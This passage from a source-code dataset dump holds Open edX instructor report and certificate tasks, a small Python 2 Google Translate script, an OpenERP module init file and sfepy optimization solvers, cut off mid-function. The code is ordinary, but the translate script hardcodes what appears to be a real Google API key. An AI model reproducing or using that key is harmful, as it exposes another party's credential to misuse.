current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
upload_csv_to_report_store(rows, 'may_enroll_info', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def get_executive_report(course_id):
"""
Returns dict containing information about the course executive summary.
"""
single_purchase_total = PaidCourseRegistration.get_total_amount_of_purchased_item(course_id)
bulk_purchase_total = CourseRegCodeItem.get_total_amount_of_purchased_item(course_id)
paid_invoices_total = InvoiceTransaction.get_total_amount_of_paid_course_invoices(course_id)
gross_paid_revenue = single_purchase_total + bulk_purchase_total + paid_invoices_total
all_invoices_total = Invoice.get_invoice_total_amount_for_course(course_id)
gross_pending_revenue = all_invoices_total - float(paid_invoices_total)
gross_revenue = float(gross_paid_revenue) + float(gross_pending_revenue)
refunded_self_purchased_seats = PaidCourseRegistration.get_self_purchased_seat_count(
course_id, status='refunded'
)
refunded_bulk_purchased_seats = CourseRegCodeItem.get_bulk_purchased_seat_count(
course_id, status='refunded'
)
total_seats_refunded = refunded_self_purchased_seats + refunded_bulk_purchased_seats
self_purchased_refunds = PaidCourseRegistration.get_total_amount_of_purchased_item(
course_id,
status='refunded'
)
bulk_purchase_refunds = CourseRegCodeItem.get_total_amount_of_purchased_item(course_id, status='refunded')
total_amount_refunded = self_purchased_refunds + bulk_purchase_refunds
top_discounted_codes = CouponRedemption.get_top_discount_codes_used(course_id)
total_coupon_codes_purchases = CouponRedemption.get_total_coupon_code_purchases(course_id)
bulk_purchased_codes = CourseRegistrationCode.order_generated_registration_codes(course_id)
unused_registration_codes = 0
for registration_code in bulk_purchased_codes:
if not RegistrationCodeRedemption.is_registration_code_redeemed(registration_code.code):
unused_registration_codes += 1
self_purchased_seat_count = PaidCourseRegistration.get_self_purchased_seat_count(course_id)
bulk_purchased_seat_count = CourseRegCodeItem.get_bulk_purchased_seat_count(course_id)
total_invoiced_seats = CourseRegistrationCode.invoice_generated_registration_codes(course_id).count()
total_seats = self_purchased_seat_count + bulk_purchased_seat_count + total_invoiced_seats
self_purchases_percentage = 0.0
bulk_purchases_percentage = 0.0
invoice_purchases_percentage = 0.0
avg_price_paid = 0.0
if total_seats != 0:
self_purchases_percentage = (float(self_purchased_seat_count) / float(total_seats)) * 100
bulk_purchases_percentage = (float(bulk_purchased_seat_count) / float(total_seats)) * 100
invoice_purchases_percentage = (float(total_invoiced_seats) / float(total_seats)) * 100
avg_price_paid = gross_revenue / total_seats
course = get_course_by_id(course_id, depth=0)
currency = settings.PAID_COURSE_REGISTRATION_CURRENCY[1]
return {
'display_name': course.display_name,
'start_date': course.start.strftime("%Y-%m-%d") if course.start is not None else 'N/A',
'end_date': course.end.strftime("%Y-%m-%d") if course.end is not None else 'N/A',
'total_seats': total_seats,
'currency': currency,
'gross_revenue': float(gross_revenue),
'gross_paid_revenue': float(gross_paid_revenue),
'gross_pending_revenue': gross_pending_revenue,
'total_seats_refunded': total_seats_refunded,
'total_amount_refunded': float(total_amount_refunded),
'average_paid_price': float(avg_price_paid),
'discount_codes_data': top_discounted_codes,
'total_seats_using_discount_codes': total_coupon_codes_purchases,
'total_self_purchase_seats': self_purchased_seat_count,
'total_bulk_purchase_seats': bulk_purchased_seat_count,
'total_invoiced_seats': total_invoiced_seats,
'unused_bulk_purchase_code_count': unused_registration_codes,
'self_purchases_percentage': self_purchases_percentage,
'bulk_purchases_percentage': bulk_purchases_percentage,
'invoice_purchases_percentage': invoice_purchases_percentage,
}
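# A worked example of the arithmetic above, with invented figures: 40 self-purchased,
# 40 bulk-purchased and 20 invoiced seats (total_seats = 100) and gross_revenue = 5000.0
# give
#
#     self_purchases_percentage    = (40.0 / 100.0) * 100  # 40.0
#     bulk_purchases_percentage    = (40.0 / 100.0) * 100  # 40.0
#     invoice_purchases_percentage = (20.0 / 100.0) * 100  # 20.0
#     avg_price_paid               = 5000.0 / 100          # 50.0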
def upload_exec_summary_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
For a given `course_id`, generate an HTML report that provides a snapshot of how the course is doing.
"""
start_time = time()
report_generation_date = datetime.now(UTC)
status_interval = 100
enrolled_users = CourseEnrollment.objects.users_enrolled_in(course_id)
true_enrollment_count = 0
for user in enrolled_users:
if not user.is_staff and not CourseAccessRole.objects.filter(
user=user, course_id=course_id, role__in=FILTERED_OUT_ROLES
).exists():
true_enrollment_count += 1
task_progress = TaskProgress(action_name, true_enrollment_count, start_time)
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
current_step = {'step': 'Gathering executive summary report information'}
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, generating executive summary report',
task_info_string,
action_name,
current_step
)
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
task_progress.attempted += 1
# get the course executive summary report information.
data_dict = get_executive_report(course_id)
data_dict.update(
{
'total_enrollments': true_enrollment_count,
'report_generation_date': report_generation_date.strftime("%Y-%m-%d"),
}
)
# By this point, we've got the data that we need to generate html report.
current_step = {'step': 'Uploading executive summary report HTML file'}
task_progress.update_task_state(extra_meta=current_step)
TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
# Perform the actual upload
upload_exec_summary_to_store(data_dict, 'executive_report', course_id, report_generation_date)
task_progress.succeeded += 1
# One last update before we close out...
TASK_LOG.info(u'%s, Task type: %s, Finalizing executive summary report task', task_info_string, action_name)
return task_progress.update_task_state(extra_meta=current_step)
def upload_course_survey_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing the survey results for the course, and store using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Gathering course survey report information'}
task_progress.update_task_state(extra_meta=current_step)
distinct_survey_fields_queryset = SurveyAnswer.objects.filter(course_key=course_id).values('field_name').distinct()
survey_fields = []
for unique_field_row in distinct_survey_fields_queryset:
survey_fields.append(unique_field_row['field_name'])
survey_fields.sort()
user_survey_answers = OrderedDict()
survey_answers_for_course = SurveyAnswer.objects.filter(course_key=course_id).select_related('user')
for survey_field_record in survey_answers_for_course:
user_id = survey_field_record.user.id
if user_id not in user_survey_answers.keys():
user_survey_answers[user_id] = {
'username': survey_field_record.user.username,
'email': survey_field_record.user.email
}
user_survey_answers[user_id][survey_field_record.field_name] = survey_field_record.field_value
header = ["User ID", "User Name", "Email"]
header.extend(survey_fields)
csv_rows = []
for user_id in user_survey_answers.keys():
row = []
row.append(user_id)
row.append(user_survey_answers[user_id].get('username', ''))
row.append(user_survey_answers[user_id].get('email', ''))
for survey_field in survey_fields:
row.append(user_survey_answers[user_id].get(survey_field, ''))
csv_rows.append(row)
task_progress.attempted = task_progress.succeeded = len(csv_rows)
task_progress.skipped = task_progress.total - task_progress.attempted
csv_rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
upload_csv_to_report_store(csv_rows, 'course_survey_results', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def upload_proctored_exam_results_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name): # pylint: disable=invalid-name
"""
For a given `course_id`, generate a CSV file containing
information about proctored exam results, and store using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Calculating info about proctored exam results in a course'}
task_progress.update_task_state(extra_meta=current_step)
# Compute result table and format it
query_features = _task_input.get('features')
student_data = get_proctored_exam_results(course_id, query_features)
header, rows = format_dictlist(student_data, query_features)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
upload_csv_to_report_store(rows, 'proctored_exam_results_report', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def generate_students_certificates(
_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate certificates only for the students selected by the 'student_set' value in
`task_input`; otherwise generate certificates for all enrolled students.
"""
start_time = time()
students_to_generate_certs_for = CourseEnrollment.objects.users_enrolled_in(course_id)
student_set = task_input.get('student_set')
if student_set == 'all_whitelisted':
# Generate certificates for all whitelisted students.
students_to_generate_certs_for = students_to_generate_certs_for.filter(
certificatewhitelist__course_id=course_id,
certificatewhitelist__whitelist=True
)
elif student_set == 'whitelisted_not_generated':
# Whitelisted students who have not already been issued certificates.
students_to_generate_certs_for = students_to_generate_certs_for.filter(
certificatewhitelist__course_id=course_id,
certificatewhitelist__whitelist=True
).exclude(
generatedcertificate__course_id=course_id,
generatedcertificate__status__in=CertificateStatuses.PASSED_STATUSES
)
elif student_set == "specific_student":
specific_student_id = task_input.get('specific_student_id')
students_to_generate_certs_for = students_to_generate_certs_for.filter(id=specific_student_id)
task_progress = TaskProgress(action_name, students_to_generate_certs_for.count(), start_time)
current_step = {'step': 'Calculating students already have certificates'}
task_progress.update_task_state(extra_meta=current_step)
statuses_to_regenerate = task_input.get('statuses_to_regenerate', [])
if student_set is not None and not statuses_to_regenerate:
# Skip filtering students only when a student set is given and there are no statuses to regenerate
students_require_certs = students_to_generate_certs_for
else:
students_require_certs = students_require_certificate(
course_id, students_to_generate_certs_for, statuses_to_regenerate
)
if statuses_to_regenerate:
# Mark existing generated certificates as 'unavailable' before regenerating
# We need to call this method after "students_require_certificate" otherwise "students_require_certificate"
# would return no results.
invalidate_generated_certificates(course_id, students_to_generate_certs_for, statuses_to_regenerate)
task_progress.skipped = task_progress.total - len(students_require_certs)
current_step = {'step': 'Generating Certificates'}
task_progress.update_task_state(extra_meta=current_step)
course = modulestore().get_course(course_id, depth=0)
# Generate certificate for each student
for student in students_require_certs:
task_progress.attempted += 1
status = generate_user_certificates(
student,
course_id,
course=course
)
if CertificateStatuses.is_passing_status(status):
task_progress.succeeded += 1
else:
task_progress.failed += 1
return task_progress.update_task_state(extra_meta=current_step)
def cohort_students_and_upload(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
Within a given course, cohort students in bulk, then upload the results
using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
# Iterate through rows to get total assignments for task progress
with DefaultStorage().open(task_input['file_name']) as f:
total_assignments = 0
for _line in unicodecsv.DictReader(UniversalNewlineIterator(f)):
total_assignments += 1
task_progress = TaskProgress(action_name, total_assignments, start_time)
current_step = {'step': 'Cohorting Students'}
task_progress.update_task_state(extra_meta=current_step)
# cohorts_status is a mapping from cohort_name to metadata about
# that cohort. The metadata will include information about users
# successfully added to the cohort, users not found, and a cached
# reference to the corresponding cohort object to prevent
# redundant cohort queries.
cohorts_status = {}
with DefaultStorage().open(task_input['file_name']) as f:
for row in unicodecsv.DictReader(UniversalNewlineIterator(f), encoding='utf-8'):
# Try to use the 'email' field to identify the user. If it's not present, use 'username'.
username_or_email = row.get('email') or row.get('username')
cohort_name = row.get('cohort') or ''
task_progress.attempted += 1
if not cohorts_status.get(cohort_name):
cohorts_status[cohort_name] = {
'Cohort Name': cohort_name,
'Students Added': 0,
'Students Not Found': set()
}
try:
cohorts_status[cohort_name]['cohort'] = CourseUserGroup.objects.get(
course_id=course_id,
group_type=CourseUserGroup.COHORT,
name=cohort_name
)
cohorts_status[cohort_name]["Exists"] = True
except CourseUserGroup.DoesNotExist:
cohorts_status[cohort_name]["Exists"] = False
if not cohorts_status[cohort_name]['Exists']:
task_progress.failed += 1
continue
try:
add_user_to_cohort(cohorts_status[cohort_name]['cohort'], username_or_email)
cohorts_status[cohort_name]['Students Added'] += 1
task_progress.succeeded += 1
except User.DoesNotExist:
cohorts_status[cohort_name]['Students Not Found'].add(username_or_email)
task_progress.failed += 1
except ValueError:
# Raised when the user is already in the given cohort
task_progress.skipped += 1
task_progress.update_task_state(extra_meta=current_step)
current_step['step'] = 'Uploading CSV'
task_progress.update_task_state(extra_meta=current_step)
# Filter the output of `add_users_to_cohorts` in order to upload the result.
output_header = ['Cohort Name', 'Exists', 'Students Added', 'Students Not Found']
output_rows = [
[
','.join(status_dict.get(column_name, '')) if column_name == 'Students Not Found'
else status_dict[column_name]
for column_name in output_header
]
for _cohort_name, status_dict in cohorts_status.iteritems()
]
output_rows.insert(0, output_header)
upload_csv_to_report_store(output_rows, 'cohort_results', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def students_require_certificate(course_id, enrolled_students, statuses_to_regenerate=None):
"""
Returns the list of students for whom certificates need to be generated.
If 'statuses_to_regenerate' is given, return students that have generated certificates
whose status lies in 'statuses_to_regenerate'.
If 'statuses_to_regenerate' is not given, return all enrolled students, skipping the ones
whose certificates have already been generated.
:param course_id:
:param enrolled_students:
:param statuses_to_regenerate:
"""
if statuses_to_regenerate:
# Return students that have generated certificates whose status lies in 'statuses_to_regenerate'
students_require_certificates = enrolled_students.filter(
generatedcertificate__course_id=course_id,
generatedcertificate__status__in=statuses_to_regenerate
)
# Materialize the results now; otherwise subsequent operations on the table could fetch the wrong data
return list(students_require_certificates)
else:
# compute those students whose certificates are already generated
students_already_have_certs = User.objects.filter(
~Q(generatedcertificate__status=CertificateStatuses.unavailable),
generatedcertificate__course_id=course_id)
# Return all enrolled students, skipping the ones whose certificates have already been generated
return list(set(enrolled_students) - set(students_already_have_certs))
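# A minimal sketch of the default branch above, with hypothetical user objects:
#
#     enrolled_students           = [alice, bob, carol]
#     students_already_have_certs = [bob]
#     list(set(enrolled_students) - set(students_already_have_certs))  # -> [alice, carol]
#
# Note the result order is not guaranteed, since Python sets are unordered.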
def invalidate_generated_certificates(course_id, enrolled_students, certificate_statuses): # pylint: disable=invalid-name
"""
Invalidate generated certificates for all enrolled students in the given course having status in
'certificate_statuses'.
Generated certificates are invalidated by marking their status 'unavailable' and setting verify_uuid, download_uuid,
download_url and grade to empty strings.
:param course_id: Course Key for the course whose generated certificates need to be removed
:param enrolled_students: (queryset or list) students enrolled in the course
:param certificate_statuses: certificate statuses for which generated certificates should be invalidated
"""
certificates = GeneratedCertificate.objects.filter( # pylint: disable=no-member
user__in=enrolled_students,
course_id=course_id,
status__in=certificate_statuses,
)
# Mark generated certificates as 'unavailable' and set download_url, download_uuid, verify_uuid and
# grade to empty strings for each row
certificates.update(
status=CertificateStatuses.unavailable,
verify_uuid='',
download_uuid='',
download_url='',
grade='',
)
def upload_ora2_data(
_xmodule_instance_args, _entry_id, course_id, _task_input, action_name
):
"""
Collect ora2 responses and upload them to S3 as a CSV
"""
start_date = datetime.now(UTC)
start_time = time()
num_attempted = 1
num_total = 1
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
task_progress = TaskProgress(action_name, num_total, start_time)
task_progress.attempted = num_attempted
curr_step = {'step': "Collecting responses"}
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s for all submissions',
task_info_string,
action_name,
curr_step,
)
task_progress.update_task_state(extra_meta=curr_step)
try:
header, datarows = OraAggregateData.collect_ora2_data(course_id)
rows = [header] + [row for row in datarows]
# Update progress to failed regardless of error type
except Exception: # pylint: disable=broad-except
TASK_LOG.exception('Failed to get ORA data.')
task_progress.failed = 1
curr_step = {'step': "Error while collecting data"}
task_progress.update_task_state(extra_meta=curr_step)
return UPDATE_STATUS_FAILED
task_progress.succeeded = 1
curr_step = {'step': "Uploading CSV"}
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s',
task_info_string,
action_name,
curr_step,
)
task_progress.update_task_state(extra_meta=curr_step)
upload_csv_to_report_store(rows, 'ORA_data', course_id, start_date)
curr_step = {'step': 'Finalizing ORA data report'}
task_progress.update_task_state(extra_meta=curr_step)
TASK_LOG.info(u'%s, Task type: %s, Upload complete.', task_info_string, action_name)
return UPDATE_STATUS_SUCCEEDED
|
agpl-3.0
|
andrewshadura/omim
|
tools/python/google_translate.py
|
53
|
1336
|
#!/usr/bin/python
import re
import sys
import urllib
import simplejson
import time
baseUrl = "http://www.googleapis.com/language/translate/v2"
def translate(text,src='en'):
targetLangs = ["ja", "fr", "ar", "de", "ru", "sv", "zh", "fi", "ko", "ka", "be", "nl", "ga", "el", "it", "es", "th", "ca", "cy", "hu", "sr", "fa", "eu", "pl", "uk", "sl", "ro", "sq", "cs", "sk", "af", "hr", "hy", "tr", "pt", "lt", "bg", "la", "et", "vi", "mk", "lv", "is", "hi"]
retText=''
for target in targetLangs:
params = ({'source': src,
'target': target,
'key': 'AIzaSyDD5rPHpqmeEIRVI34wYI1zMplMq9O_w2k'
})
translation = target + ':'
params['q'] = text
resp = simplejson.load(urllib.urlopen('%s' % (baseUrl), data = urllib.urlencode(params)))
print resp
try:
translation += resp['data']['translations'][0]['translatedText']
except:
return retText
retText += '|' + translation
return retText
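# A minimal sketch of the intended output, assuming the live Translate v2 API responds:
# for the text "hello" the function returns a pipe-separated string roughly of the form
#
#     "|ja:<japanese text>|fr:<french text>|ar:<arabic text>|..."
#
# which test() below prefixes with "en:hello".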
def test():
for line in sys.stdin:
line = line.rstrip('\n\r')
retText = 'en:' + line + translate(line)
print retText
if __name__=='__main__':
reload(sys)
sys.setdefaultencoding('utf-8')
try:
test()
except KeyboardInterrupt:
print "\n"
sys.exit(0)
|
apache-2.0
|
songmonit/CTTMSONLINE
|
addons/email_template/__init__.py
|
381
|
1144
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2009 Sharoon Thomas
# Copyright (C) 2010-Today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
import email_template
import wizard
import res_partner
import ir_actions
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
rc/sfepy
|
sfepy/solvers/optimize.py
|
4
|
13138
|
from __future__ import absolute_import
import numpy as nm
import numpy.linalg as nla
from sfepy.base.base import output, get_default, pause, Struct
from sfepy.base.log import Log, get_logging_conf
from sfepy.base.timing import Timer
from sfepy.solvers.solvers import OptimizationSolver
import scipy.optimize as sopt
import scipy.optimize.linesearch as linesearch
import six
from six.moves import range
def conv_test(conf, it, of, of0, ofg_norm=None):
"""
Returns
-------
flag : int
* -1 ... continue
* 0 ... small OF -> stop
* 1 ... i_max reached -> stop
* 2 ... small OFG -> stop
* 3 ... small relative decrease of OF
"""
status = -1
output('opt: iter: %d, of: %e (||ofg||: %e)' % (it, of, ofg_norm))
if (abs(of) < conf.eps_of):
status = 0
elif ofg_norm and (ofg_norm < conf.eps_ofg):
status = 2
elif (it > 0) and (abs(of0 - of) < (conf.eps_rd * abs(of0))):
status = 3
if (status == -1) and (it >= conf.i_max):
status = 1
return status
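# A minimal usage sketch mirroring the solver loop below: call conv_test() once per
# iteration and stop on any non-negative flag.
#
#     ret = conv_test(conf, it, of, of_prev, ofg_norm)
#     if ret >= 0:
#         break   # 0/1/2/3 encode the stopping reason documented above
#
# `conf` is assumed to provide eps_of, eps_ofg, eps_rd and i_max, as in the solver
# parameter tables further down.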
def wrap_function(function, args):
ncalls = [0]
times = []
timer = Timer()
def function_wrapper(x):
ncalls[0] += 1
timer.start()
out = function(x, *args)
times.append(timer.stop())
return out
return ncalls, times, function_wrapper
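# A minimal usage sketch with a made-up objective; the wrapper counts calls and times them:
#
#     ncalls, times, fn = wrap_function(lambda x, a: a * x ** 2, (3.0,))
#     fn(2.0)      # -> 12.0
#     ncalls[0]    # -> 1, number of evaluations so far
#     sum(times)   # -> total evaluation time in seconds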
def check_gradient(xit, aofg, fn_of, delta, check):
dofg = nm.zeros_like(aofg)
xd = xit.copy()
for ii in range(xit.shape[0]):
xd[ii] = xit[ii] + delta
ofp = fn_of(xd)
xd[ii] = xit[ii] - delta
ofm = fn_of(xd)
xd[ii] = xit[ii]
dofg[ii] = 0.5 * (ofp - ofm) / delta
output('**********', ii, aofg[ii], dofg[ii])
diff = abs(aofg - dofg)
aux = nm.concatenate((aofg[:,nm.newaxis], dofg[:,nm.newaxis],
diff[:,nm.newaxis]), 1)
output(aux)
output(nla.norm(diff, nm.Inf))
aofg.tofile('aofg.txt', ' ')
dofg.tofile('dofg.txt', ' ')
diff.tofile('diff.txt', ' ')
if check == 2:
import pylab
pylab.plot(aofg)
pylab.plot(dofg)
pylab.legend(('analytical', 'finite difference'))
pylab.show()
pause('gradient checking done')
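# The loop above is a central finite-difference check of the analytical gradient `aofg`,
# component by component:
#
#     dofg[ii] = (f(x + delta * e_ii) - f(x - delta * e_ii)) / (2 * delta)
#
# where e_ii is the ii-th unit vector; diff = |aofg - dofg| should then be small
# (roughly of order delta**2) if the analytical gradient is correct.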
class FMinSteepestDescent(OptimizationSolver):
"""
Steepest descent optimization solver.
"""
name = 'opt.fmin_sd'
_parameters = [
('i_max', 'int', 10, False,
'The maximum number of iterations.'),
('eps_rd', 'float', 1e-5, False,
'The relative delta of the objective function.'),
('eps_of', 'float', 1e-4, False,
'The tolerance for the objective function.'),
('eps_ofg', 'float', 1e-8, False,
'The tolerance for the objective function gradient.'),
('norm', 'numpy norm', nm.Inf, False,
'The norm to be used.'),
('ls', 'bool', True, False,
'If True, use a line-search.'),
('ls_method', "{'backtracking', 'full'}", 'backtracking', False,
'The line-search method.'),
('ls_on', 'float', 0.99999, False,
"""Start the backtracking line-search by reducing the step, if
:math:`||f(x^i)|| / ||f(x^{i-1})||` is larger than `ls_on`."""),
('ls0', '0.0 < float < 1.0', 1.0, False,
'The initial step.'),
('ls_red', '0.0 < float < 1.0', 0.5, False,
'The step reduction factor in case of correct residual assembling.'),
('ls_red_warp', '0.0 < float < 1.0', 0.1, False,
"""The step reduction factor in case of failed residual assembling
(e.g. the "warp violation" error caused by a negative volume
element resulting from too large deformations)."""),
('ls_min', '0.0 < float < 1.0', 1e-5, False,
'The minimum step reduction factor.'),
('check', '0, 1 or 2', 0, False,
"""If >= 1, check the tangent matrix using finite differences. If 2,
plot the resulting sparsity patterns."""),
('delta', 'float', 1e-6, False,
r"""If `check >= 1`, the finite difference matrix is taken as
:math:`A_{ij} = \frac{f_i(x_j + \delta) - f_i(x_j - \delta)}{2
\delta}`."""),
('output', 'function', None, False,
"""If given, use it instead of :func:`output()
<sfepy.base.base.output()>` function."""),
('yscales', 'list of str', ['linear', 'log', 'log', 'linear'], False,
'The list of four convergence log subplot scales.'),
('log', 'dict or None', None, False,
"""If not None, log the convergence according to the configuration in
the following form: ``{'text' : 'log.txt', 'plot' : 'log.pdf'}``.
Each of the dict items can be None."""),
]
def __init__(self, conf, **kwargs):
OptimizationSolver.__init__(self, conf, **kwargs)
conf = self.conf
log = get_logging_conf(conf)
conf.log = log = Struct(name='log_conf', **log)
conf.is_any_log = (log.text is not None) or (log.plot is not None)
if conf.is_any_log:
self.log = Log([[r'$||\Psi||$'], [r'$||\nabla \Psi||$'],
[r'$\alpha$'], ['iteration']],
xlabels=['', '', 'all iterations', 'all iterations'],
yscales=conf.yscales,
is_plot=conf.log.plot is not None,
log_filename=conf.log.text,
formats=[['%.8e'], ['%.3e'], ['%.3e'], ['%d']])
else:
self.log = None
def __call__(self, x0, conf=None, obj_fun=None, obj_fun_grad=None,
status=None, obj_args=None):
conf = get_default(conf, self.conf)
obj_fun = get_default(obj_fun, self.obj_fun)
obj_fun_grad = get_default(obj_fun_grad, self.obj_fun_grad)
status = get_default(status, self.status)
obj_args = get_default(obj_args, self.obj_args)
if conf.output:
globals()['output'] = conf.output
output('entering optimization loop...')
nc_of, tt_of, fn_of = wrap_function(obj_fun, obj_args)
nc_ofg, tt_ofg, fn_ofg = wrap_function(obj_fun_grad, obj_args)
timer = Timer()
time_stats = {'of' : tt_of, 'ofg': tt_ofg, 'check' : []}
ofg = None
it = 0
xit = x0.copy()
while 1:
of = fn_of(xit)
if it == 0:
of0 = ofit0 = of_prev = of
of_prev_prev = of + 5000.0
if ofg is None:
ofg = fn_ofg(xit)
if conf.check:
timer.start()
check_gradient(xit, ofg, fn_of, conf.delta, conf.check)
time_stats['check'].append(timer.stop())
ofg_norm = nla.norm(ofg, conf.norm)
ret = conv_test(conf, it, of, ofit0, ofg_norm)
if ret >= 0:
break
ofit0 = of
##
# Backtrack (on errors).
alpha = conf.ls0
can_ls = True
while 1:
xit2 = xit - alpha * ofg
aux = fn_of(xit2)
if self.log is not None:
self.log(of, ofg_norm, alpha, it)
if aux is None:
alpha *= conf.ls_red_warp
can_ls = False
output('warp: reducing step (%f)' % alpha)
elif conf.ls and conf.ls_method == 'backtracking':
if aux < of * conf.ls_on: break
alpha *= conf.ls_red
output('backtracking: reducing step (%f)' % alpha)
else:
of_prev_prev = of_prev
of_prev = aux
break
if alpha < conf.ls_min:
if aux is None:
raise RuntimeError('giving up...')
output('linesearch failed, continuing anyway')
break
# These values are modified by the line search, even if it fails
of_prev_bak = of_prev
of_prev_prev_bak = of_prev_prev
if conf.ls and can_ls and conf.ls_method == 'full':
output('full linesearch...')
alpha, fc, gc, of_prev, of_prev_prev, ofg1 = \
linesearch.line_search(fn_of,fn_ofg,xit,
-ofg,ofg,of_prev,of_prev_prev,
c2=0.4)
if alpha is None: # line search failed -- use different one.
alpha, fc, gc, of_prev, of_prev_prev, ofg1 = \
sopt.line_search(fn_of,fn_ofg,xit,
-ofg,ofg,of_prev_bak,
of_prev_prev_bak)
if alpha is None or alpha == 0:
# This line search also failed to find a better
# solution.
ret = 3
break
output(' -> alpha: %.8e' % alpha)
else:
if conf.ls_method == 'full':
output('full linesearch off (%s and %s)'
% (conf.ls, can_ls))
ofg1 = None
if self.log is not None:
self.log.plot_vlines(color='g', linewidth=0.5)
xit = xit - alpha * ofg
if ofg1 is None:
ofg = None
else:
ofg = ofg1.copy()
for key, val in six.iteritems(time_stats):
if len(val):
output('%10s: %7.2f [s]' % (key, val[-1]))
it = it + 1
output('status: %d' % ret)
output('initial value: %.8e' % of0)
output('current value: %.8e' % of)
output('iterations: %d' % it)
output('function evaluations: %d in %.2f [s]'
% (nc_of[0], nm.sum(time_stats['of'])))
output('gradient evaluations: %d in %.2f [s]'
% (nc_ofg[0], nm.sum(time_stats['ofg'])))
if self.log is not None:
self.log(of, ofg_norm, alpha, it)
if conf.log.plot is not None:
self.log(save_figure=conf.log.plot, finished=True)
else:
self.log(finished=True)
if status is not None:
status['log'] = self.log
status['status'] = ret
status['of0'] = of0
status['of'] = of
status['it'] = it
status['nc_of'] = nc_of[0]
status['nc_ofg'] = nc_ofg[0]
status['time_stats'] = time_stats
return xit
class ScipyFMinSolver(OptimizationSolver):
"""
Interface to SciPy optimization solvers scipy.optimize.fmin_*.
"""
name = 'nls.scipy_fmin_like'
_i_max_name = {
'fmin' : 'maxiter',
'fmin_bfgs' : 'maxiter',
'fmin_cg' : 'maxiter',
'fmin_cobyla' : 'maxfun',
'fmin_l_bfgs_b' : 'maxfun',
'fmin_ncg' : 'maxiter',
'fmin_powell' : 'maxiter',
'fmin_slsqp' : 'iter',
'fmin_tnc' : 'maxfun',
}
_has_grad = ('fmin_bfgs', 'fmin_cg', 'fmin_l_bfgs_b', 'fmin_ncg',
'fmin_slsqp', 'fmin_tnc')
_parameters = [
('method',
'{%s}' % ', '.join(sorted(repr(ii) for ii in _i_max_name.keys())),
'fmin', False,
'The actual optimization method to use.'),
('i_max', 'int', 10, False,
'The maximum number of iterations.'),
('*', '*', None, False,
'Additional parameters supported by the method.'),
]
def __init__(self, conf, **kwargs):
OptimizationSolver.__init__(self, conf, **kwargs)
self.set_method(self.conf)
def set_method(self, conf):
import scipy.optimize as so
try:
solver = getattr(so, conf.method)
except AttributeError:
raise ValueError('scipy solver %s does not exist!' % conf.method)
self.solver = solver
def __call__(self, x0, conf=None, obj_fun=None, obj_fun_grad=None,
status=None, obj_args=None):
import inspect
if conf is not None:
self.set_method(conf)
else:
conf = self.conf
obj_fun = get_default(obj_fun, self.obj_fun)
obj_fun_grad = get_default(obj_fun_grad, self.obj_fun_grad)
status = get_default(status, self.status)
obj_args = get_default(obj_args, self.obj_args)
timer = Timer(start=True)
kwargs = {self._i_max_name[conf.method] : conf.i_max,
'args' : obj_args}
if conf.method in self._has_grad:
kwargs['fprime'] = obj_fun_grad
if 'disp' in inspect.getargspec(self.solver)[0]:
kwargs['disp'] = conf.verbose
kwargs.update(self.build_solver_kwargs(conf))
out = self.solver(obj_fun, x0, **kwargs)
if status is not None:
status['time_stats'] = timer.stop()
return out
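# --- Hedged illustration (not part of the original module) ---
# A minimal, self-contained sketch of what ScipyFMinSolver ultimately does
# for conf.method = 'fmin': the generic i_max option is mapped to that
# solver's own iteration keyword ('maxiter') and forwarded to scipy.optimize.
# The quadratic objective below is an assumption made purely for demonstration.
if __name__ == '__main__':
    import numpy as _nm
    import scipy.optimize as _so

    def _demo_of(x):
        # Simple convex objective with its minimum at (1, 2).
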